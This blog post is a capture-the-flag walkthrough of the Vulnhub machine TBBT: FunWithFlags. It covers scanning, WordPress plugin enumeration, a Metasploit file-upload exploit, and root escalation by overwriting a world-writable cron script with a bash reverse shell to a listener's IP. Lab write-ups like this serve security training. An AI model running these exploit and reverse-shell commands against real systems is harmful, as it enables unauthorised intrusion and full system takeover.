TBBT: FunWithFlags Walkthrough vulnhub

TBBT: FunWithFlags Walkthrough Vulnhub CTF

Today, we’re sharing another Vulnhub CTF Walkthrough TBBT: FunWithFlags design by emaragkos This VM machine hosted on Vulnhub.com you can download here the machine link

Network Scanning

Our First Step is Finding the target IP Address using netdiscover

netdiscover
 TBBT: FunWithFlags  Walkthrough vulnhub

After finding the target IP address I perform Nmap Aggressive scanning (-p- parameter ) all port scanning

nmap -A 192.168.1.105 -p-
 TBBT: FunWithFlags  Walkthrough vulnhub

dirb is a web content scanner that was also used to brute force for any available files and directory on the website.

dirb http://192.168.1.105
 TBBT: FunWithFlags  Walkthrough vulnhub

Enumeration

we see dirb result many URL I open the URL http://192.168.1.105/music/wordpress/ our browser and we see a WordPress website

dirb http://192.168.1.105/music/wordpress/

without wasting our time I move on wpscan WordPress scanner ( -e ap parameter enumerate all plugin installed )

wpscan --url http://192.168.1.105/music/wordpress/ -e ap
 TBBT: FunWithFlags  Walkthrough vulnhub

I found an outdated plugin reflex-gallery version: 3.1.3 I search the exploit-db exploit and I found an exploit arbitrary file upload.

msfconsole
use unix/webapp/wp_reflexgallery_file_upload
set targeturi /music/wordpress/
set rhosts 191.168.1.105
run
shell

After ran shell command we see a black restrict shell now I importing the python3 spawn shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
cd /home
ls
 TBBT: FunWithFlags  Walkthrough vulnhub

In Amy’s home directory, I found two file notes.txt and secretdiary

cd amy
ls -lsa
 TBBT: FunWithFlags  Walkthrough

I reading the notest.txt using cat command and we see a hint massage this is my secret diary

cat notes.txt

I ran strings and our file secretdiary command according to user hint I found an 18 digit password

strings secretdiary

‌It’s an enumeration time! I move the home directory I found my second flag in penny’s home directory

cd penny
cat .FLAG.penny.txt

Privilege Escalation

cd leonard
ls -lsa

Leonard’s directory contained a bash script with some comments in it and we see the file permission all user edit this file and the file owner is the root

cat themostat_set_temp.sh

We see crontab configuration thermostat_set_temp.sh file is run automatically every one minute I create a simple bash reverse shell and echo command to overwrite the thermostat_set_temp.sh

cat /etc/crontab
echo "bash -i >& /dev/tcp/192.168.1.4/4545 0>&1" > thermostat_set_temp.sh

Before starting the bash script we need to start our netcat listener

./thermostat_set_temp.sh
nc -lvp 4545

After Wait a minute I got a reverse shell root user I move on the root directory and reading our final last flag contains the root directory

id
cd /root
ls
cat FLAG-leonard.txt
Inclusiveness 1 Walkthrough Vulnhub read

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →